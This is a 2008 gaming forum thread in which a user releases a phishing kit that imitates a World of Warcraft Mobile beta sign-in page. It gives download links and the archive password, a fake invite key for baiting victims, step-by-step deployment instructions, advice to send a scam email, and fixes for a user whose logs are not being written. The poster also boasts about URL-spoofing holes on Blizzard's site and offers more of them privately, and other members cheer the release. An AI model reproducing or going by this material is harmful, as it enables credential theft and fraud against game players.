[RELEASE] Legit looks-like URL scam - WoW Mobile Beta

**eSko** · 11-24-2008

!!! UPDATED !!!

About mobile.blizzard.com exploit:

Ok... I've modified this thread pretty much, because of ****ing Blizzard spies that are sniffing around here... I've found an exploit that allowed you to fake web address of your scam (mobile.blizzard.com) and it's been fixed after 24 hours... I've found another exploit that allows the same thing as the first one and it has been hotfixed right after few hours after I released it. So I won't write more "Blizzard website exploits" here and will send them only to ppl with more than 25 REP via PM, if they ask for it. Really funny, that so big company as Blizzard is, have to find security issues of their websites at forums like this

About WoW Mobile Adventures Beta phishing template:

I've also made brand new phishing site that was using that hotfixed exploit, but now it's regular phishing template, without any "special fetures", which that exploit trully was! It is WoW Mobile Adventures beta sign-in, so everyone who wanna try wow at his cell phones's screen is your potential target now.

Live Demo: World of Warcraft Account Login
Download: RapidShare
Mirror: MEGAUPLOAD
Password: mmowned

With this template you'll get all possible info including WotLK cd key!

Also, it's designed to look like closed beta signup for selected blizz beta testers, so victim have to fill down his "invite key"... So i recommend to send victim an email with some scam text and included WoW Mobile Adventures beta invitation key - it's another step to make scam looks more serius and credible.

The WoW Mobile Adventures beta invitatin key (it's fake - only usable for this scam): V92RDM-H8EW-P7JV6B-M7KJ-C7PVTO

Steps:
1) Download phishing pack
2) Delete index.htm (useless file nowadays, when the exploit is hotfixed

)
3) Rename index2.htm to index.htm
4) Upload
5) Change log.html CHMOD to 777
6) Ready to use

I RECOMMEND TO USE MY SCAM TEMPLATE WITH THIS E-MAIL posted by drak2223: http://www.mmowned.com/forums/wow-sc...-template.html

Ok... Maybe you are curious what about new and working exploit that allows you to fake address and make your phishing more belivable... Ok i can say you this: I have discovered another noobish security hole at blizz's website that can do exact same thing as my 2 already hotfixed exploits... :wave:

**~~Liquid Malfunction~~** · 11-24-2008

This is hell of epic +Rep

**skatrdie94** · 11-24-2008

I dun get it
lol

**eSko** · 11-24-2008

Originally Posted by skatrdie94

I dun get it
lol

what did you do not get? Its pretty simple and useful :-)

**~~Purple Sprite~~** · 11-24-2008

Cool, +rep

**lxlshadelxl** · 11-24-2008

Very nice, + rep

**ViND_** · 11-24-2008

Awesome. Just pure win. +Rep ofcourse, I dont wanna be a naughty leech

**eSko** · 11-24-2008

thx for your replies and for REP
i am glad to hear that you like it :-)

**~~Liquid Malfunction~~** · 11-24-2008

Originally Posted by eSko

thx for your replies and for REP
i am glad to hear that you like it :-)

hey eSko I am having a problem,you see when I upload the phisher I make all the sub folders and off that. But when I test it out I don't get the logs and the last page is black and has some text that you need to highlight to see.And one more thing how do I get the site Url to say mobile.blizzard it still just says h1.ripway/*************/

**vvvat** · 11-24-2008

**** rapidshare

. can some1 reupload this nice scam to another filehost?

**~~Starforsaken~~** · 11-24-2008

This is pretty win if....WoW on a mobile was even remotely believable?

**eSko** · 11-24-2008

Originally Posted by drak2223

hey eSko I am having a problem,you see when I upload the phisher I make all the sub folders and off that. But when I test it out I don't get the logs and the last page is black and has some text that you need to highlight to see.And one more thing how do I get the site Url to say mobile.blizzard it still just says h1.ripway/*************/

1) download and unpack RapidShare: Easy Filehosting
2) open index.htm and edit it:
find

Code:

http://www.wow-europe.webzdarma.cz/index2.htm

and replace it with

Code:

http://www.your_address/index2.htm

that address is there 15 times, so edit it on every row!

3)now upload it and change CHMOD of log.html to 777 !
this is VERY important, because if you don't do this, the php script won't be able to write informations into that file
4) it should work now...

BTW, you have to link victims the /index.html.... if you link them index2.html then yes, the address will stay your old, original address...

Originally Posted by vvvat

**** rapidshare

. can some1 reupload this nice scam to another filehost?

ok i'll upload it to megaupload for you...

Originally Posted by Starforsaken

This is pretty win if....WoW on a mobile was even remotely believable?

it's not complete wow client.. it's meant only for viewing auction, mailbox and chatting at guild chat... there are many myths about this mobile wow client so it's pretty believable

**eSko** · 11-24-2008

uploaded to megaupload -> updated first post

updated after Blizzards's ****ing fix -> updated first post

**Thidan** · 11-24-2008

I hereby declare this one:
EPIC!

**TheGreatRowaH** · 11-24-2008

w00t, now we just need a scam email

User Tag List

Thread: [RELEASE] Legit looks-like URL scam - WoW Mobile Beta

Thread Tools

Search Thread

[RELEASE] WoW Mobile Beta

Similar Threads

[Addon + Guide] Make your WoW look like Diablo.

OwnedCore Forums

casino

CoreCoins

My OwnedCore

About Us

Casino